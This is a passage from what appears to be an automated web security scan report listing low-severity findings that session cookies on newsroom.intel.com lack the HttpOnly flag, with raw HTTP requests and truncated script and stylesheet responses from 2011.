s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=E669082769D079AB1B6BB7D5060E305B.node6IPR; Domain=.intel.com; Path=/
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=16105 t=1296956932351295
X-JSL: D=16111 t=1296956932351295
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 80219

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

12.10. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=033E5A52A6AE27B548A5D9EF6D8E5C5E.node6IPR; Domain=.intel.com; Path=/
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=12373 t=1296956932379103
X-JSL: D=12379 t=1296956932379103
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 49485

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

12.11. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=E514EB9C000C502ED588D726B4DEE54A.node6IPR; Domain=.intel.com; Path=/
X-JAL: 2
Vary: Accept-Encoding
CacheHit: D=26463 t=1296956899733157
X-JSL: D=26470 t=1296956899733157
Content-Type: text/javascript;charset=UTF-8
Connection: close

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...

12.12. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:37 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE4D59A501972634AF56AA68D8967AE2.node6IPR; Domain=.intel.com; Path=/
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=131861 t=1296956917538280
X-JSL: D=131867 t=1296956917538280
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 20313

(function(c){var a=c.scrollTo=function(f,e,d){c(window).scrollTo(f,e,d)};a.defaults={axis:"xy",duration:parseFloat(c.fn.jquery)>=1.3?0:1};a.window=function(d){return c(window).scrollable()};c.fn.scrol
...[SNIP]...

12.13. http://newsroom.intel.com/4.0.6/styles/jive-community.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-community.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-community.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=5C2FF08678A49B81193C49BCB33E4E29.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=133137 t=1296956878891570
X-JSL: D=133142 t=1296956878891570
Content-Type: text/css
Connection: keep-alive
Content-Length: 20341

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

12.14. http://newsroom.intel.com/4.0.6/styles/jive-global.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-global.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-global.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=58D180D97AB319652D509966F32227A7.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=143063 t=1296956848658188
X-JSL: D=143069 t=1296956848658188
Content-Type: text/css
Connection: keep-alive
Content-Length: 208122

/* RESET STYLES (see http://meyerweb.com/eric/tools/css/reset/) */
/*
*
* this is not a straight copy/paste from the above URL. this has been
* custom modified by us. so don't go copy/paste u
...[SNIP]...

12.15. http://newsroom.intel.com/4.0.6/styles/jive-icons.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-icons.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-icons.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=8C181A1B01DBE3858DD2ECB1E90CB81F.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=132982 t=1296956849476958
X-JSL: D=132987 t=1296956849476958
Content-Type: text/css
Connection: keep-alive
Content-Length: 25134

/* Things that might be sprited */
.jive-icon-plus,
.jive-icon-minus {
   /* edit widget layouts, leave before standard sprites */
   background-repeat: no-repeat;
   background-position: 0;
   padding: 2px
...[SNIP]...

12.16. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-sidebar.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-sidebar.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=351863A282E6B8E427C3AA53A775A16B.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=128681 t=1296956864616423
X-JSL: D=128686 t=1296956864616423
Content-Type: text/css
Connection: keep-alive
Content-Length: 28548

/*
jive-sidebar.css
*/
.jive-sidebar {
border: 1px solid #e5e5e5;
font-size: 1em;
margin: 0 0 25px;
overflow: hidden;
padding: 0;
position: relative; /* req for IEs */
-moz
...[SNIP]...

12.17. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-videomodule.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-videomodule.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=C7BC34108896684F5F49C2D9A038A463.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=128999 t=1296956879588525
X-JSL: D=129004 t=1296956879588525
Content-Type: text/css
Connection: keep-alive
Content-Length: 32219

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

12.18. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-widgets.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-widgets.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; 